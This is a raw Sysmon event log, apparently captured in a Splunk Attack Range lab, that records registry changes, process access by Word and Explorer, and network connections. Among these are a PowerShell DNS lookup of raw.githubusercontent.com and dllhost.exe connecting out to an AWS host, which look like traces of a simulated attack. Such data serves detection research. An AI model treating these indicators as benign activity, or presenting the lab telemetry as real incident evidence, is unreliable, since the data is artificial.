17:30:15.780{21761711-6127-6080-BD5D-00000000BB01}1572raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.109.133;::ffff:185.199.110.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 12241200x80000000000000001530893Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:17.673{21761711-FD8A-607E-F232-00000000BB01}5776C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001530892Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:17.668{21761711-FD8A-607E-F232-00000000BB01}5776C:\Windows\SysWOW64\dllhost.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 13241300x80000000000000001530891Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:17.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000014069A\VirtualDesktopBinary Data 12241200x80000000000000001530890Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:17.290{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000014069A 10341000x80000000000000001530889Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.236{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530888Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:17.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530887Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:17.236{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 10341000x80000000000000001530886Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.236{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530885Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.174{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530884Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.174{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5261AB0855C59193C66F04FA33F938AC,SHA256=EB1F1501C0A0F6D1981BD9CC7533FFDDC59559CD0BD848CAEA674F52E31634FAfalsefalse - insufficient disk space 23542300x80000000000000001061107Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:17.048{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E78927722929B540D36F320F86F259F,SHA256=B3342F5839457CBB23219FFA1A169A2664C900782F603A729EEF50B784936915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061106Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:17.048{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061105Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:17.048{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530903Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:18.971{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530902Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:18.971{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 354300x80000000000000001530901Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.807{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64685-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x80000000000000001530900Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:16.158{21761711-EE8A-607D-CF12-00000000BB01}7212C:\Windows\SysWOW64\dllhost.exeWIN-HOST-5\Administratortcptruefalse10.0.1.15win-host-5.attackrange.local64684-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 354300x80000000000000001530899Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.428{00000000-0000-0000-0000-000000000000}1572<unknown process>-tcptruefalse10.0.1.15win-host-5.attackrange.local64683-false185.199.111.133cdn-185-199-111-133.github.com443https 11241100x80000000000000001530898Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:18.276{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530897Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:18.276{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE11C129F1CCBE3586D31DFE581DA7FC,SHA256=862E3FB18E0B5348D6572F7EBF4105B49B45AA92954316AAE87F98533DFF3FA7falsefalse - insufficient disk space 23542300x80000000000000001061110Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:18.050{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0048B23AE5F862CF44A2ACACD5B11289,SHA256=FB5C467F21259FC480D884E26F8BB677D716C73F8455D7933756791B0B311CC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061109Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:18.048{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061108Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:18.048{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530896Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:18.272{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001530895Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:18.272{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=493CFD3456AACCA9F1F5511CB44B439F,SHA256=0C49014982DD8988834F26225F0B694F3165C5DAD53DD8CCBF8B192BDFF78696falsefalse - insufficient disk space 354300x80000000000000001530906Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:17.223{21761711-FD8A-607E-F232-00000000BB01}5776C:\Windows\SysWOW64\dllhost.exeWIN-HOST-5\Administratortcptruefalse10.0.1.15win-host-5.attackrange.local64686-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x80000000000000001530905Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:19.294{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530904Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:19.294{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AED47BFB7E64C90973F537D59F2FC12E,SHA256=2DBF45C42AA9A4CDF2F19FAB287680713AAF910677A0A0812949A64F51D05DFEfalsefalse - insufficient disk space 354300x80000000000000001061115Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:14.712{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1296-false10.0.1.12-8000- 23542300x80000000000000001061114Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:19.070{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27C77FCFC82127C48DA2EF1C28869E00,SHA256=36F272E7949D6B2837EE1D480DCF98E64D63022956511C67ABA45A626FEDC756,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061113Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:19.049{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061112Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:19.049{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061111Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:19.038{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E263B68F9CF753AC357C7128A2F7E96A,SHA256=32EC51B6B205E31A63AAC6E43C9F852218D3FF8995DC307707B713556C4B68A4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530908Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:20.297{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530907Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:20.297{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45380C6A089CAC6877383A3FD3DFFAB2,SHA256=2E991886F66D5763B4CF50CADEC41EDAAC78510A13403982455B399D89268A22falsefalse - insufficient disk space 10341000x80000000000000001061127Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.948{761B69BB-612C-6080-985C-00000000BA01}23686972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061126Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.807{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-612C-6080-985C-00000000BA01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061125Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.805{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061124Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.805{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061123Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.805{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061122Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.805{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061121Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.804{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-612C-6080-985C-00000000BA01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061120Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.804{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-612C-6080-985C-00000000BA01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061119Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.804{761B69BB-612C-6080-985C-00000000BA01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061118Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.079{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 